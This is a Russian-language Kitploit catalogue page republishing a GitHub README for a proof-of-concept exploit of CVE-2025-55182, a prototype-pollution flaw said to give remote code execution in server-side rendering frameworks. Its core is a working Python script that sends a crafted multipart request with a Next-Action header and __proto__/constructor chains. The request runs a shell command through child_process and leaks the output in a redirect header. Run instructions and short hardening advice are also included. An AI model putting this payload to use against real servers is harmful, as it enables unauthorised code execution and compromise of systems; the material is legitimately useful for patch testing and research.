Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Proof-of-Concept — Эксплойт Proof-of-Concept для CVE-2025-55182, демонстрирующий загрязнение прототипа, приводящее к удаленному выполнению кода в реализациях серверного рендеринга. Включает Python-скрипт эксплойта и рекомендации по безопасности. | Kitploit
Инструменты/GitHubGitHub/thekamran/cve-2025-55182-proof-of-concept
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubthekamran/cve-2025-55182-proof-of-concept

CVE-2025-55182-Proof-of-Concept

Эксплойт Proof-of-Concept для CVE-2025-55182, демонстрирующий загрязнение прототипа, приводящее к удаленному выполнению кода в реализациях серверного рендеринга. Включает Python-скрипт эксплойта и рекомендации по безопасности.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-55182 Proof-of-Concept

Этот репозиторий содержит Proof-of-Concept (PoC) для CVE-2025-55182 — уязвимости, связанной с Prototype Pollution, приводящей к удалённому выполнению кода (RCE) в некоторых реализациях серверного рендеринга.

⚠️ Предупреждение: Данный PoC предназначен строго для образовательных, исследовательских целей и авторизованного тестирования безопасности на личных или контролируемых средах. Несанкционированное использование на системах без разрешения незаконно.


Обзор уязвимости

Уязвимость возникает, когда непроверенные пользовательские данные внедряются во внутренние структуры объектов JavaScript (Prototype Pollution). В сочетании с определёнными потоками выполнения это может привести к произвольному выполнению кода.

В данном PoC используются цепочки свойств, такие как __proto__ и constructor, для эскалации загрязнения в контекст выполнения.


Proof-of-Concept

Ниже представлен exploit.py, демонстрирующий, как можно эксплуатировать уязвимость:

root@kitploit:~
import requests
import json

url = "http://localhost:3000"

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
}

prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"

files = {
    "0": (
        None,
        json.dumps({
            "then": "$1:__proto__:then",
            "status": "resolved_model",
            "reason": -1,
            "value": '{"then":"$B1337"}',
            "_response": {
                "_prefix": prefix,
                "_formData": {"get": "$1:constructor:constructor"}
            }
        }),
        "application/json",
    ),
    "1": (None, "\"$@0\""),
}

response = requests.post(url, headers=headers, files=files)

print("Headers:", response.headers.get('x-action-redirect'))

Как запустить

root@kitploit:~
python3 exploit.py

Убедитесь, что запускаете его только в локальной или тестовой среде.


Статус исправления

Если эта уязвимость затрагивает реальный проект, проверьте наличие и установите последние исправления безопасности, выпущенные мейнтейнерами.


Рекомендации по безопасности

  • Регулярно выполняйте npm audit и применяйте npm audit fix для обеспечения безопасности зависимостей
  • Проверяйте и очищайте все пользовательские входные данные
  • Предотвращайте доступ к внутренним прототипам объектов JavaScript
  • Используйте изоляцию SSR-песочницы, где это возможно
  • Ограничьте или отключите выполнение child_process в продакшене

Лицензия

MIT License

Скачать инструмент